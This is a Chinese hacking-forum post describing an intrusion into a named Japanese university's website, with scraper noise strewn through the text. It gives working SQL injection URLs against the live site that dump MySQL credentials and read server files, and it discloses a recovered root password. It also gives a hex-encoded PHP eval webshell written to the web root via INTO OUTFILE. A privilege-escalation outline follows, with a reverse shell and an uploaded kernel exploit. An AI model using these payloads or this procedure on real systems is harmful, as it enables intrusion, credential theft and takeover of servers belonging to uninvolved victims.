入侵日本同志社大学

admin

入侵日本同志社大学技术分析
! r* N& m: Y, c2 \
http://www.doshisha.ac.jp/chs/news/index.php?i=-1
6 ?. M! ?4 l( k! n% U然后联合查询，猜字段，查版本，查密码，读取文件…….就是各种查啊，语句是：
' l+ W% [# l  Q  V5 X4 A" N
: L# L( G4 j# k) _http://www.doshisha.ac.jp/chs/news/index.php?i=-1+union+select+1,@@datadir,3,load_file(‘/etc/httpd/conf/httpd.conf’),5,group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),7,8+from+mysql.user
' [6 F2 W5 W) p* i/ u8 N: Y

6 O4 z: J. Y" L/ {2 `0 B0 u
//@@datadir为数据库文件路径
3 A1 [: j# M! u, p. ^2 Y
( i; D, R% a. j
//load_file读取网站容器apache的配置文件

, K" |* F: i) B: M2 m5 }7 B
8 Z3 v2 h8 Y, K! I2 k  h//group_concat读取MySQL管理员的名字、密码、是否允许读写文件和允许登录的远程计算机
复制代码
; j% o. D) X4 j6 [0 O
虽然解得MySQL的root账户密码为mysql00，但是host为localhost，只允许本机登陆，所以用处不大。
  d7 O  [/ i$ @# ^; R+ S( r
而且Apache的配置文件显示，服务器拒绝非该大学的ip访问/admin/和phpMyAdmin，所以即使爆出管理员账户密码也没用。
- G: H) e; x1 u4 A) B- A( n(大家对以上各种查和语句不太懂的可以参考以下文章：http://bbs.blackbap.org/thread-2243-1-1.html)
7 x; T' S( G7 n* t$ `5 `0 N) {- }* P- T
前面load_file是因为发现了各文件夹权限限制的死，不允许外校ip登陆，所以就猜了一下apache的配置文件绝对路径为默认，后来发现还真的是默认的路径。
: `! \! I  A; ?8 ~7 r如果知道怎么猜apache配置文件的路径的请参考以下文章：http://bbs.blackbap.org/thread-2242-1-1.html
9 B: Y; _- f# i9 p) Z0 k' U1 ?
7 k* \- u' Y/ p: A既然已经知道了Apache的配置文件的内容，我们也就轻易知道了网站物理路径，路径为：/http/www/koho/
虽然/admin和phpMyAdmin的目录都限制了，但是想了想，我们只要有注入点就可以可以写入shell了，因为php的GPC为off，怎么判断为off我就不说了。
7 y/ e* `& E1 N: V% H- h直接写一句话：
  i2 A" Z( h2 f  \. l  i
- p! D; N0 E1 Ehttp://www.doshisha.ac.jp/chs/news/index.php?i=-1+union+select+ 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,0x3c3f2f2a,3,4,5,6,7,0x2a2f3f3e+into+outfile+’/http/www/koho/english/engnews_img/aa.php’#
/ w5 O8 q; z" Z4 @! u
3 e. I  j* ^/ _: o! y' i/ u  o2 m
0 E* {9 ]$ k, e, }. j& J
. l* h5 r% n. T& j! R//最后的#是为了闭合前面的语句
2 i) f4 m8 Z1 l2 L; _
* P/ \' @8 c& m+ }* I9 g4 C
. u5 p4 Z: _9 a4 ^" ~/*其中的0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E

) O8 x0 O( C; d) \! R
为一句话<?php @eval($_POST['cmd']);?>的HEX编码，不懂(HEX编码)的话Google一下就好*/

( m7 A2 a" x7 y9 I& S& d
//如果直接select 一句话 into outfile ‘路径’会提示字段数不同，所以select 1,2,3,4…来执行注入语句

- l* H$ q, f5 {
//后面的0x3c3f2f2a和0x2a2f3f3e分别为’<?php //’的和’?>’HEX因为select后面的3,4,5,6会被写入webshell中，可能会导致一句话执行错误
//所以最后aa.php的内容就是”<?php @eval($_POST['cmd']);?><?php //3,4,5,6,7 ?>”
% J8 j3 [' i& _8 Z3 n* L复制代码

HEX其实就是十六进制编码，不知道这个编码的话，去搜一下好了，HEX编码转换在线本地各种工具各种有
通过上述注入语句，我们就得到了一句话木马:



1 _. |8 C4 q, Y/ b0 K$ t! U

http://www.doshisha.ac.jp/english/engnews_img/aa.php
! e2 t7 F. u2 y- c- A复制代码

用菜刀连接，密码是cmd，如图所示：
然后在命令提示行里看了一下，现在的权限是：
0 o7 z- F- b( w) U& {4 ^
之后按照惯例我看了一下/tmp/文件夹，发现/TMP/权限居然被禁掉了，很少有服务器禁掉这个文件夹的。
好在赋权给这个文件夹不需要root，直接执行赋权语句：

1 E! n& h& S' }  o) t( ^8 e

: o# K) V# [0 q
) u& y. |5 v) }/ P- e
3 N- y) {. c1 A: `1 T. Ychmod +x /tmp/
+ w1 F+ p/ P" f" Q  N复制代码

9 z, q. M7 o( K4 d& i在这说一下，linux里面的文件夹跟文件一样，执行命令自然也可以按照像文件一样的执行
然后就查了一下内核版本：
$ y7 A( g, B* R; y* u0 X9 X

+ I. q* A  w0 m6 h

+ X# o- L8 x- q- x. j7 a8 `% }
* _3 H( _8 X" ]- ]" n* o3 ^- O) {! Vuname-a


//其实lsb_release -a
复制代码
9 n5 N& K( G' H, o( q" {# J- p
如图所示：
/ i6 L& H- B9 n' O& U
- @  W; X6 l2 ~内核版本：linux mainz1 2.6.28-194.e15
# ]5 ?8 X" A" f0 V系统描述为：Red Hat Enterprise Linux Server release 5.5 (Tikanga)
查完了系统版本之后就去找找相应的提权脚本！~然后传到/tmp/文件夹

0 x* X3 f+ Q! N; {6 o0 q$ v; J然后给予执行权限
/ [) [4 A3 I1 I! ]7 r7 o) c一般我都是传上去c源文件，然后”gcc -o /tmp/程序 /tmp/C源码”这样，如果gcc不能用，在其他机器编译好了直接传上去其实也可以，就像这样


. S: p0 {7 v/ {- l) D


8 l' f: o5 m5 T% X$ R7 F: bchmod +x /tmp/2.6.18-194
1 R9 f) w6 @5 ]1 z4 H/ Z复制代码 然后直接执行！~
- _# `( i3 \. a9 K( R+ {+ m, [
总结：
这个注入点的基本思路就是，发现MySQL账户为root，GPC设置为off，搞到了物理路径就直接写Webshell了
  C3 [% [- J/ j! C9 B0 m% W提权部分原理就是，本地监听端口，将对方机器反弹回cmdshell来，然后把和内核版本对应的EXP传上去，编译运行，得到root
5 ~2 l! q4 ^5 j! T5 G3 [